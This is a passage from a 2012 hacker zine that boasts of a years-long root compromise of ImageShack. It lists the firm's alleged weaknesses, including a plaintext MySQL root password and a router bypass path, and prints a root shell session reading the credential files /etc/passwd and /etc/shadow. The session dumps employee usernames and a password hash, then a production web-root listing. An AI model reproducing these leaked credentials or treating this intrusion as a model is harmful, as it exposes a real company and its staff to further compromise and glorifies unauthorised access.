█████████████▒████████
▓▒██████▒░█░███░░ ▒███████████▒
███████████ ▓█████████████████████▒
▓████ ▒█████████▒▒░███████████████████████▒
░▒███████░████████▒██ ▒██████████████████████░
▓███████████████▒██ ░█ ░████████████████████████░
████████████████████▒ ███▒█████████████████████████████
░████████▒██████████████████ ▒█████████████████████████▒
███████████▒████████████ ▒ ███████████████████████████▒
▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
█████████ ▒███▒ ███████░ ███████████████████████████████████
█████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
███████████████████▓ ░ █ ░██████████████████████████████████
████████████████████ █▒ ██░▒███████████████████████████████████
▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
██████████████████ ▓███ █░ █████████████▓██████████████████ █
██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
██████████████████░ ▓ █░ █ ███████████████████████████████░
██████████████████ ██ ▒███ ████████████████████████████████▒█
███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
███████████████▒▒▒ ███ ████████████████████████████▒ █░
█░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
█▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
█▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
█▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
█▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
█████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
█▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 4
htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
<BL4D3> What do you want?
<CRASH_0V3RR1D3> Ummm... we come in peace?
<AC1D_BURN> We need your help. If you're up to it.
<R4Z0R> She's buff. Ballsy.
<BL4D3> Let's keep her.
<R4Z0R> Waste the dude.
<AC1D_BURN> We need your help to overload the Gibson so we can kill the Da Vinci
virus and download the worm program.
<R4Z0R> She's rabid, but cute. You are going to need more than just two media
icons like us. You need an army.
<BL4D3> That's it! An electronic army! If I were us, I'd get on the internet,
send out a major distress signal.
<R4Z0R> Hackers of the World, Unite!
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2012 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄
██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > ImageShack █ █
█████████▓▓██████████████████▓▓▓██▓███▓█ > Symantec ▀▀▀█ █▀▀
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Cryto █ █
█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Pwned lineup █ █▄▄▄▄▄▄▄▄▄
███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > 0dayz ▀▀▀▀█ █
█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > Closing words █ █▀█ █
█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Files █ █▄█ █
█▓█ ________________________________ █▓█ > Shoutz █ █▄▄▄▄▄▄
█▓█ ________________________________ ███ < ▀▀▀▀▀▀▀█ █
██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > See reverse for █ █▀▀▀▀
█▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > 5-HTP █ █▄▄▄▄
████ ████████████████████▓▓██████ ████ < █ █
▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x01
▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█ ▄▄ ▄▄ ▄▄▄ ▄▄▄ ▄▄▄ █ ▄ ▄ ▄▄▄ ▄▄▄ ▄ ▄ █ Now offering webshell █▒
█ █ █ █ █▄█ █ ▄▄█▄ ▀▀▀█ █▄▄█ █▄█ █ █▄▀ █ uploads! █▒
▄▄█▄▄ █ ▀ █ █ █ █▄█ █▄▄ ▄▄▄█ █ █ █ █ █▄▄ █ ▀▄ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▒
<jacklevin> what is a zine exactly?
<SYSOP> We have massive infection. Multiple GPI and FSI viruses.
<HAL> They're coming in from remote nodes. They're going after the Kernel!
<MARGO> Colonel who?
<HAL> The System Command Processor, it's the brain.
<MARGO> Cancer, brain... Brain Cancer?
* DUKE_ELLINGSON has joined #thegibson.
<DUKE_ELLINGSON> Belford, what's going on?
<PLAGUE> In short, Duke, a shit storm.
> Back in 2009, ImageShack was hacked for the 'first' time (bit.ly/N8cEsk) by
RoMeO. Following the breach, ImageShack published an official blog post in
response; assuring the user base of new 'security systems' and hardened
configurations. Meanwhile, RoMeO fell for a honeypot after trying to get back
into ImageShack. He subsequently recieved a call from the CEO, the dialogue
of which didn't exactly follow that of 'Romeo and Juliet'. RoMeO profusely
apologized for hacking ImageShack.
Well, we like a challenge, so we decided to find out what changes were
made.
Heres a list of criteria we found that evidenced the hardened security on all
of ImageShack's equipment:
- Run all MySQL instances as root
- Ensure all kernels are 2008 or earlier
- Routers compromisable via /level/16/exec/-/show/run
- Hardcode database passwords into as many files as possible (though we do
give them credit, the root MySQL pass 'mutaborius' was never cracked by
hashcat.)
- Implement a firewall that allows outgoing backconnects
- Add tasks to root's crontab that regularly run files owned by the www user
- Run outdated Nginx
- Enable register_globals
- Use one $1 shadow hash for everything
Protip, if your security sucks this much, your incoming firewall rules and
your keyauth won't save you.
That being said, ImageShack has been completely owned, from the ground up.
We have had root and physical control of every server and router they own.
For years.
Priority 5: WWW servers (There are hundreds of WWW servers, so we decided to
only include the primary one, 'rdag3')
> root@rdag3.prod.imageshack.com:~# export owned=www.imageshack.us
root@rdag3.prod.imageshack.com:~# export by=HTP
root@rdag3.prod.imageshack.com:~# export PS1='# '
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux rdag3.prod.imageshack.com 2.6.27.41-170.2.117.fc10.x86_64 #1 SMP Thu
Dec 10 10:36:29 EST 2009 x86_64 x86_64 x86_64 GNU/Linux
# w
19:38:03 up 419 days, 5:26, 1 user, load average: 1.66, 2.04, 2.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:498:497:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nutch:x:710:100::/home/nutch:/bin/bash
image:x:500:1000::/home/image:/bin/bash
video:x:700:7000::/home/video:/bin/bash
gmond:x:516:516:Ganglia Monitor Daemon:/var/lib/ganglia:/sbin/nologin
jack:x:520:100::/home/jack:/bin/bash
macbeth:x:503:100::/home/macbeth:/bin/bash
lord:x:504:100::/home/lord:/bin/tcsh
cwhite:x:519:100::/home/cwhite:/bin/bash
lyolik:x:518:100::/home/lyolik:/bin/bash
disotheb:x:506:100::/home/disotheb:/bin/bash
janderso:x:507:100::/home/janderso:/bin/bash
rjoseph:x:508:100::/home/rjoseph:/bin/bash
npettas:x:512:100::/home/npettas:/bin/bash
ganglia:x:496:498:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
chris:x:521:100::/home/chris:/bin/bash
leo:x:711:100::/home/leo:/bin/bash
edwin:x:522:100::/home/edwin:/bin/bash
msmirnov:x:714:100::/home/msmirnov:/bin/bash
build:x:715:715::/home/build:/bin/bash
sundar:x:726:100::/home/sundar:/bin/bash
matt:x:727:100::/home/matt:/bin/bash
moe:x:725:100::/home/moe:/bin/bash
chrmaury:x:728:100::/home/chrmaury:/bin/bash
wes:x:729:100::/home/wes:/bin/bash
tyler:x:731:100::/home/tyler:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
allan:x:745:100::/home/allan:/bin/bash
serge:x:746:100::/home/serge:/bin/bash
nagesh:x:747:100::/home/nagesh:/bin/bash
josiah:x:748:100::/home/josiah:/bin/bash
david:x:749:100::/home/david:/bin/bash
oleg:x:750:100::/home/oleg:/bin/bash
root:$1$gQ5eTV9K$EejhJfWSmlZhODzygiTmt/:15585:0:99999:7:::
bin:*:14469:0:99999:7:::
daemon:*:14469:0:99999:7:::
adm:*:14469:0:99999:7:::
lp:*:14469:0:99999:7:::
sync:*:14469:0:99999:7:::
shutdown:*:14469:0:99999:7:::
halt:*:14469:0:99999:7:::
mail:*:14469:0:99999:7:::
uucp:*:14469:0:99999:7:::
operator:*:14469:0:99999:7:::
games:*:14469:0:99999:7:::
gopher:*:14469:0:99999:7:::
ftp:*:14469:0:99999:7:::
nobody:*:14469:0:99999:7:::
avahi-autoipd:!!:14469:0:99999:7:::
vcsa:!!:14469:0:99999:7:::
ntp:!!:14469:0:99999:7:::
dbus:!!:14469:0:99999:7:::
polkituser:!!:14469:0:99999:7:::
nscd:!!:14469:0:99999:7:::
tcpdump:!!:14469:0:99999:7:::
avahi:!!:14469:0:99999:7:::
mailnull:!!:14469:0:99999:7:::
smmsp:!!:14469:0:99999:7:::
apache:!!:14469:0:99999:7:::
sshd:!!:14469:0:99999:7:::
torrent:!!:14469:0:99999:7:::
haldaemon:!!:14469:0:99999:7:::
nutch:!!:14471:0:99999:7:::
image:$1$gQ5eTV9K$EejhJfWSmlZhODzygiTmt/:15585:0:99999:7:::
video:!!:14471:0:99999:7:::
gmond:!!:14471:0:99999:7:::
jack:!!:14471:0:99999:7:::
macbeth:!!:14471:0:99999:7:::
lord:!!:14471:0:99999:7:::
cwhite:!!:14471:0:99999:7:::
lyolik:!!:14471:0:99999:7:::
disotheb:!!:14471:0:99999:7:::
janderso:!!:15036:0:99999:7:::
rjoseph:!!:14471:0:99999:7:::
npettas:!!:14471:0:99999:7:::
ganglia:!!:14471::::::
chris:!!:14476:0:99999:7:::
leo:!!:14671:0:99999:7:::
edwin:!!:14671:0:99999:7:::
msmirnov:!!:14671:0:99999:7:::
build:!!:15036:0:99999:7:::
sundar:!!:15036:0:99999:7:::
matt:!!:15036:0:99999:7:::
moe:!!:15036:0:99999:7:::
chrmaury:!!:15036:0:99999:7:::
wes:!!:15036:0:99999:7:::
tyler:!!:15036:0:99999:7:::
named:!!:15056::::::
allan:!!:15167:0:99999:7:::
serge:!!:15188:0:99999:7:::
nagesh:!!:15205:0:99999:7:::
josiah:!!:15292:0:99999:7:::
david:!!:15384:0:99999:7:::
oleg:!!:15426:0:99999:7:::
# ls -alt /home/image/www
total 3636
drwxrwxr-x 5 image image 12288 Aug 28 18:49 en
drwxrwxr-x 4 image image 4096 Aug 28 18:46 mobile
drwxrwxr-x 9 image image 12288 Aug 28 18:41 images
drwxrwxr-x 69 image users 20480 Aug 28 17:40 .
-rw-rw-r-- 1 image image 19102 Aug 28 17:40 my.php
drwxrwxr-x 4 image image 4096 Aug 27 17:13 api
drwxrwxr-x 2 image image 4096 Aug 27 17:13 db_api
-rw-rw-r-- 1 image image 6202 Aug 27 17:13 gallery_api_v2.php
-rw-rw-r-- 1 image image 22 Aug 27 16:47 .gitignore
drwxrwxr-x 7 image image 4096 Aug 27 16:47 css
-rw-rw-r-- 1 image image 139 Aug 27 16:47 set_perm_yf3_popup_cookie.php
-rw-rw-r-- 1 image image 13990 Aug 27 10:45 config.inc
drwxrwxr-x 3 image image 4096 Aug 27 10:45 registration
drwxrwxr-x 2 image image 4096 Aug 24 16:49 auth
-rw-rw-r-- 1 image image 2240 Aug 24 16:49 auth.php
-rw-rw-r-- 1 image image 11236 Aug 24 16:49 backend.inc
-rw-rw-r-- 1 image image 2619 Aug 24 16:49 delete_api.php
-rw-rw-r-- 1 image image 51024 Aug 24 16:49 functions.php
-rw-rw-r-- 1 image image 17891 Aug 24 16:49 gallery_api_v2.inc
-rw-rw-r-- 1 image image 37934 Aug 24 16:49 index.php
-rw-rw-r-- 1 image image 3239 Aug 24 16:49 setlogin.php
drwxrwxr-x 2 image image 4096 Aug 24 16:49 tpl
-rw-rw-r-- 1 image image 25444 Aug 24 16:49 upload_api.php
-rw-rw-r-- 1 image image 31502 Aug 24 16:49 v_images.php
drwxrwxr-x 4 image image 4096 Aug 22 05:33 homepage
drwxrwxr-x 2 image image 4096 Aug 20 13:59 xhr
-rw-rw-r-- 1 image image 2226 Aug 17 09:38 restore_image.php
-rw-rw-r-- 1 image image 24411 Aug 15 17:30 iconvert.inc
-rw-rw-r-- 1 image image 13200 Aug 15 17:30 notify.php
drwxrwxr-x 2 image image 4096 Aug 15 17:30 paypal
drwxrwxr-x 18 image image 4096 Aug 15 17:30 scripts
-rw-rw-r-- 1 image image 1094 Aug 14 15:42 403.php
-rw-rw-r-- 1 image image 47040 Aug 14 15:42 actions.js
drwxrwxr-x 2 image image 4096 Aug 14 15:42 ads
-rw-rw-r-- 1 image image 1208 Aug 14 15:42 aff.inc
-rw-rw-r-- 1 image image 7447 Aug 14 15:42 codegen.js
-rw-rw-r-- 1 image image 3825 Aug 14 15:42 codegen.php
-rwxrwxr-x 1 image image 6777 Aug 14 15:42 contact.php
-rwxrwxr-x 1 image image 5957 Aug 14 15:42 content.php
-rw-rw-r-- 1 image image 12231 Aug 14 15:42 content_round.php
-rw-rw-r-- 1 image image 8698 Aug 14 15:42 dbclient.inc
-rw-rw-r-- 1 image image 7289 Aug 14 15:42 dbclient.php
-rw-rw-r-- 1 image image 86 Aug 14 15:42 delete.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 dropbox
-rw-rw-r-- 1 image image 1054 Aug 14 15:42 dropbox.inc
-rw-rw-r-- 1 image image 10637 Aug 14 15:42 edit.php
-rw-rw-r-- 1 image image 4342 Aug 14 15:42 edit_preview.php
-rw-rw-r-- 1 image image 3386 Aug 14 15:42 exifize.php
-rw-rw-r-- 1 image image 179 Aug 14 15:42 file_toucher.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 find
-rw-rw-r-- 1 image image 403 Aug 14 15:42 friendhead.php
drwxrwxr-x 3 image image 4096 Aug 14 15:42 friends
-rw-rw-r-- 1 image image 15501 Aug 14 15:42 fullimg.php
-rwxrwxr-x 1 image image 33564 Aug 14 15:42 gal.php
-rw-rw-r-- 1 image image 30149 Aug 14 15:42 gallery_api.inc
-rw-rw-r-- 1 image image 849 Aug 14 15:42 get_image_info.php
-rw-rw-r-- 1 image image 858 Aug 14 15:42 get_props_info.php
-rw-rw-r-- 1 image image 11028 Aug 14 15:42 glitter.js
-rw-rw-r-- 1 image image 16107 Aug 14 15:42 glitter.php
-rw-rw-r-- 1 image image 3471 Aug 14 15:42 glitter_preview.php
-rw-rw-r-- 1 image image 71 Aug 14 15:42 grab_images.php
-rw-rw-r-- 1 image image 1022 Aug 14 15:42 handle_thumbs.php
-rw-rw-r-- 1 image image 3048 Aug 14 15:42 hbase_connector.php
drwxrwxr-x 4 image image 4096 Aug 14 15:42 img
drwxrwxr-x 3 image image 4096 Aug 14 15:42 import
-rw-rw-r-- 1 image image 423 Aug 14 15:42 isr1.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 itransact
-rwxrwxr-x 1 image image 18963 Aug 14 15:42 javascript.php
-rw-rw-r-- 1 image image 4400 Aug 14 15:42 jsonrater.php
-rw-rw-r-- 1 image image 10743 Aug 14 15:42 links.php
-rw-rw-r-- 1 image image 2451 Aug 14 15:42 logout.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 mobilevideo
drwxrwxr-x 2 image image 4096 Aug 14 15:42 my_gallery
-rw-rw-r-- 1 image image 274 Aug 14 15:42 mygal.php
-rw-rw-r-- 1 image image 1336 Aug 14 15:42 newuploader_ad.php
-rw-rw-r-- 1 image image 685 Aug 14 15:42 perms.php
drwxrwxr-x 5 image image 4096 Aug 14 15:42 prefs
-rw-rw-r-- 1 image image 11933 Aug 14 15:42 register_image.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 reviewer
-rw-rw-r-- 1 image image 6242 Aug 14 15:42 save_images.php
drwxrwxr-x 5 image image 4096 Aug 14 15:42 shareable
drwxrwxr-x 3 image image 4096 Aug 14 15:42 slideshow
-rw-rw-r-- 1 image image 8105 Aug 14 15:42 snapshot.php
-rw-rw-r-- 1 image image 3010 Aug 14 15:42 stillshot.php
drwxrwxr-x 2 image image 4096 Aug 14 15:42 syndicate
drwxrwxr-x 2 image image 4096 Aug 14 15:42 toolbar
-rw-rw-r-- 1 image image 8877 Aug 14 15:42 transload.php
-rw-rw-r-- 1 image image 7651 Aug 14 15:42 utils.inc
drwxrwxr-x 2 image image 4096 Aug 14 15:42 video
drwxrwxr-x 3 image image 4096 Aug 14 15:42 windows-uploader
-rw-rw-r-- 1 image image 51289 Aug 14 15:42 xmldata.inc
-rw-rw-r-- 1 image image 1150 Aug 14 15:42 xmlinc_dump.inc
-rw-rw-r-- 1 image image 1165 Aug 14 00:00 unruly_iframe.html
-rw-rw-r-- 1 image image 923 Aug 14 00:00 hacker.php (lol)
-rw-rw-r-- 1 image image 1376 Aug 14 00:00 pornrx.inc
-rw-rw-r-- 1 image image 8103 Aug 14 00:00 rater.php
-rw-rw-r-- 1 image image 19098 Aug 14 00:00 blacklist.inc
-rw-r--r-- 1 root root 375 Jul 30 12:47 setyfrog3cookie.php
-rw-rw-r-- 1 image image 3050 Mar 28 19:26 checkSubscribe.php
-rw-rw-r-- 1 image image 996 Feb 9 2012 check_subscribe.php
-rw-rw-r-- 1 image image 1973 Feb 9 2012 checkSubscibe.php
-rw-rw-r-- 1 image image 4452 Feb 8 2012 images.php
drwxrwxr-x 2 image image 4096 Feb 7 2012 style
-rw-r--r-- 1 jack users 61440 Feb 1 2012 depl.tar
drwxrwxr-x 2 image image 4096 Jan 24 2012 nudejs
-rw-rw-r-- 1 image image 10259 Nov 2 2011 links_old.php
drwxrwxr-x 2 image image 4096 Oct 13 2011 meebo
drwxrwxr-x 2 image image 4096 Oct 13 2011 meeboo
-rw-rw-r-- 1 image image 478 Jul 18 2011 check_captcha.php
-rw-rw-r-- 1 image image 636 Jul 18 2011 lijit_default_300x250.html
-rw-rw-r-- 1 image image 630 Jul 18 2011 lijit_default_728x90.html
-rw-rw-r-- 1 image image 589 Jul 18 2011 moderationtag.php
-rwxrwxr-x 1 image image 296 Jul 18 2011 new_search.php
-rw-rw-r-- 1 image image 1118 Jul 18 2011 save_album_info.php
-rw-rw-r-- 1 image image 14608 Jul 18 2011 search.js
drwxrwxr-x 2 image image 4096 Jul 18 2011 test
drwxrwxr-x 2 image image 4096 Jun 23 2011 nodejs
-rwxr-xr-x 1 image image 14239 Jun 23 2011 jobs.php
drwxrwxr-x 2 image image 4096 Jun 14 2011 picasa
-rw-rw-r-- 2 image image 838 Jun 14 2011 postemail.php
-rw-rw-r-- 2 image image 68 Jun 14 2011 postlog-db.php
-rw-rw-r-- 2 image image 3413 Jun 14 2011 prev_next.inc
drwxrwxr-x 5 image image 4096 Jun 14 2011 promo
-rwxrwxr-x 2 image image 249 Jun 14 2011 proxy.pac
-rw-rw-r-- 2 image image 487 Jun 14 2011 quantcast.php
-rw-rw-r-- 2 image image 500 Jun 14 2011 quickreg.php
-rw-rw-r-- 2 image image 1167 Jun 14 2011 read_slave_proxy.inc
-rw-rw-r-- 2 image image 383 Jun 14 2011 rebuild-prevnext.php
-rw-rw-r-- 2 image image 9910 Jun 14 2011 recaptchalib.php
-rw-rw-r-- 2 image image 49189 Jun 14 2011 recorder.v2.swf
-rw-rw-r-- 2 image image 1002 Jun 14 2011 recorder.v2.xml
-rw-rw-r-- 2 image image 635 Jun 14 2011 reddit_ico.gif
-rw-rw-r-- 2 image image 4129 Jun 14 2011 redirect_api.php
-rw-rw-r-- 2 image image 166 Jun 14 2011 redirect_img.php
-rw-rw-r-- 2 image image 391 Jun 14 2011 refresh.php
-rw-rw-r-- 2 image image 6715 Jun 14 2011 related.inc
-rwxrwxr-x 2 image image 114 Jun 14 2011 remover.sh
-rw-rw-r-- 2 image image 162 Jun 14 2011 report_abuse.php
-rw-rw-r-- 2 image image 369 Jun 14 2011 revon2.php
-rw-rw-r-- 2 image image 116 Jun 14 2011 robots.txt
-rw-rw-r-- 2 image image 43 Jun 14 2011 rolead.file
-rw-rw-r-- 2 image image 98 Jun 14 2011 rotate.file
-rw-rw-r-- 2 image image 83 Jun 14 2011 rules.php
-rw-rw-r-- 2 image image 521 Jun 14 2011 saymedia_ad.htm
drwxrwxr-x 2 image image 4096 Jun 14 2011 sb
-rw-rw-r-- 2 image image 40137 Jun 14 2011 scam.png
-rw-rw-r-- 2 image image 46325 Jun 14 2011 scripts.js
-rw-rw-r-- 2 image image 12013 Jun 14 2011 scripts_old.js
-rw-rw-r-- 2 image image 225 Jun 14 2011 search.php
-rw-rw-r-- 2 image image 560 Jun 14 2011 searchapi.inc
-rw-rw-r-- 2 image image 453 Jun 14 2011 send_note.php
-rw-rw-r-- 2 image image 638 Jun 14 2011 session_fp.inc
-rw-rw-r-- 2 image image 221 Jun 14 2011 set_video.php
-rw-rw-r-- 2 image image 902 Jun 14 2011 setmyid.php
-rw-rw-r-- 2 image image 2043 Jun 14 2011 setxmlproperties.php
-rw-rw-r-- 2 image image 580 Jun 14 2011 si.php
drwxrwxr-x 2 image image 4096 Jun 14 2011 sitemap
-rw-rw-r-- 2 image image 1885 Jun 14 2011 sm.php
-rwxrwxr-x 2 image image 1183 Jun 14 2011 smart_ln.sh
-rw-rw-r-- 2 image image 2544 Jun 14 2011 snapshot-status.php
drwxrwxr-x 6 image image 4096 Jun 14 2011 socialnet
-rwxrwxr-x 2 image image 112 Jun 14 2011 split.sh
-rw-rw-r-- 2 image image 957 Jun 14 2011 starrate.js
-rw-rw-r-- 2 image image 98 Jun 14 2011 style.css
-rw-rw-r-- 2 image image 180 Jun 14 2011 subscribe.php
drwxrwxr-x 2 image image 4096 Jun 14 2011 swfupload
-rw-rw-r-- 2 image image 2678 Jun 14 2011 tags.php
drwxrwxr-x 3 image image 4096 Jun 14 2011 templates
-rw-rw-r-- 2 image image 365 Jun 14 2011 tgMore.php
-rw-rw-r-- 2 image image 338 Jun 14 2011 tgSmall.php
-rw-rw-r-- 2 image image 1284 Jun 14 2011 thfun.php
-rw-rw-r-- 2 image image 2839 Jun 14 2011 thumbnail.png
-rw-rw-r-- 2 image image 4377 Jun 14 2011 toolbar_img.png
-rw-rw-r-- 2 image image 3752 Jun 14 2011 toolbar_img2.png
-rwxrwxr-x 2 image image 237 Jun 14 2011 toolbar_promo.php
-rw-rw-r-- 2 image image 2481 Jun 14 2011 top_group.php
